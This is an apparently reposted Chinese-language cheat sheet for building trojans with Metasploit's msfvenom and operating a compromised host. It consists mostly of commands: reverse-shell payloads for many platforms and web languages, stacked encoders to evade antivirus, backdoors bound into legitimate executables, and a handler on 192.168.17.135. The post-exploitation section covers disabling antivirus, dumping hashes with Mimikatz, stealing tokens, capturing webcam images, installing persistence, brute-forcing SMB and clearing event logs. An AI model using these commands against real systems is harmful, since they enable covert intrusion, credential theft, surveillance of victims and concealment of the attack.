msf生成木马

Linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

 msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.machoWeb Payloads

PHP

  msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

ASP

 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

 msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads

Python

  msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

  msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

  msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

接受反弹:

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp 

set LHOST 192.168.17.135

set LPORT 7001

exploit

具体使用:

生成木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=7001 --platform win -f exe -o /54320.exe

监控:

nc -l -p 7001

或者:

msfconsole
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.17.135
set LPORT 7001
exploit

msf生成木马_第1张图片

 此时可以已经连接上了msf的马了,执行命令了msf生成木马_第2张图片

 msf生成木马_第3张图片

如若,想要利用msf的其他的扫描模块,则直接输入:background

msf生成木马_第4张图片

 

msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具

是一个框架,可以改动
 

-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe

-p 指定payload路径
lhost=1.1.1.1 lport=4444 //
-a x86 //操作系统的架构
--platform win //平台,win是windows 平台
-f exe //输出格式,这里是exe格式输出
-o //输出的名字

加密生成shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.17.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

-f raw 以原始的模式输出
-e 接加密编码模块 -i 接数字加密多少次 | ....再次加密
-b ‘\xoo’ 把\xoo特色字符处理掉

generate -b '\x00\xff' -f exe -o /home/1.exe


把后门绑定在其他模板上:-x
 

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.17.135 lport=7001 -arch x86 --platform win -f exe -o c.exe

msf生成木马_第5张图片

 直接在linux上运行下面命令生成木马

普通反弹tcp(shell_reverse_tcp):

msfvenom -p windows/shell_reverse_tcp lhost=192.168.17.135 lport=7001 --platform win -f exe -o /home/kali/Desktop/5432.exe

利用:可以直接用nc连接,或者msf不用设payload

利用反弹meterpreter_tcp/http:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.135  lport=7001--platform win -f exe -o /home/kali/Desktop/54320.exe

使用加密:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135   lport=7001 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322

加密绑定文件(有时候文件无法正常使用):

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135 lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135  lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt

不加密绑定文件:

msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=192.168.17.135 lport=7001--platform win -f exe -o /home/kali/Desktop/54322_bing.exe

生成源码:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135  lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt

  msf获取session后的操作       参考:msf 获取session 之后 - 胖丫丶 - 博客园

进程迁移:
    ps   获取进程
    getpid  shell的进程号
    migrate  迁移
    run post/windows/manage/migrate     自动迁移


shell之后:
    sysinfo 获取系统信息
    run post/windows/gather/checkvm        查看目标是否允许在虚拟机
    idletime        最近运行的时间
    route        查看目录完整网络
    getuid        当前用户名
    run post/windows/manage/killav        关闭杀毒软件
    run post/windows/manage/enable_rdp    开启3389
    run post/windows/manage/autoroute    目标子网情况
    background    隐藏后台
    route add    添加路由
    route    print查看
    run post/windows/gather/enum_logged_on_users    列举当前有多少用户登录过目标主机
    run post/windows/gather/enum_applocations        列举安装在目标主机上
    run post/windows/gather/credentials/windows_autologin    抓取自动登录的用户名密码
    load espia   screengrad    抓取此时屏幕截图
    webcam_list    有无摄像头
    webcam_snap    拍照
    webcam_stream    开启直播模式
    shell 进入目标shell
文件系统命令:
    pwd或getwd    目标主机当前处于哪个目录
    getlwd    自己处于哪个目录
    search -f *.txt -d c:\    搜索c盘下所有txt文件
    download    c:\test.txt /root 下载到本机
    upload    /root/text.txt c:    上传

权限提升:
    whoami/groups    查看当前权限
    getuid    查看当前权限
    getsystem    尝试提权
    systeminfo    查看补丁
    使用wmic    列出安装的补丁
令牌窃取:
    use incognito
    list_token -u 列出token
    impersonate_token  +上述列出的有效令牌    假冒令牌攻击(需要两个\\)
    成功后运行shell

Hash攻击:
    1.使用hashdump 抓取密码
    非SYSTEM运行时会失败
    run windows/gather/smart_hashdump    导出域所有用户(windows7.开启UAC会导致失败)
    2.Quarks    PwDump
    3.windows credentials Editor(WCE)
        上传wce到目标。找到文件 wce -w
    4.Mimikatz(管理员)
    load Mimikatz       加载    
    msv        抓取Hash
    kerberos    抓取系统票据
    wdigest        获取系统账户信息
    mimikatz_command -f samdump::hashed    抓取hash
    mimikatz_command -f handle::list  查看进程
    mimikatz_command -f service::list  windows 服务
    mimikatz_command -f crypto::listProviders  查看系统证书
    支持PowerShell调用(Invoke-Mimikatz)

后门:
    1.Cymothoa:
        cymothoa -p 982 -s 1 -y 4444    选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444
        nc -nvv 目标主机 4444    使用nc进行连接
    2.Persistence:
        run persistence -A -S -U -i 60 -p 4321 -r 目标主机
            A :自动启动payload程序
            S :系统启动时自动加载
            U :用户登录时自动启动
            X :开机时自动加载
            i :回连的时间间隔
            P :监听反向连接端口号
            r :目标主机
Web 后门:
    msf中使用generate生成

内网渗透:
    信息收集:
        net user /domain : 查看域用户
        net view /domain :    查看有几个域
        net    view /domain :xxx    查看域内主机
        net group /domain  : 查看域里面的组
        net group "domain computers" /domain 查看域内所有的主机名
        net group "domain admins " /domain 查看域管理员
        net group "domain controllers" /domain 查看域控制器
        net group "enterprise admins" /domain 查看企业管理器
        nettime /domain 查看时间服务器

    PowerShell 寻找域管在线服务
    获取域管理权
    登录域控制:使用msf中的PsExec 反弹Meterpreter

SMB爆破内网:
    先添加路由
    然后使用smb_login 或psexec_scanner
    route add 
    creds

清理日志:
    删除所有用户
    clearev    删除日志

你可能感兴趣的:(安全,windows)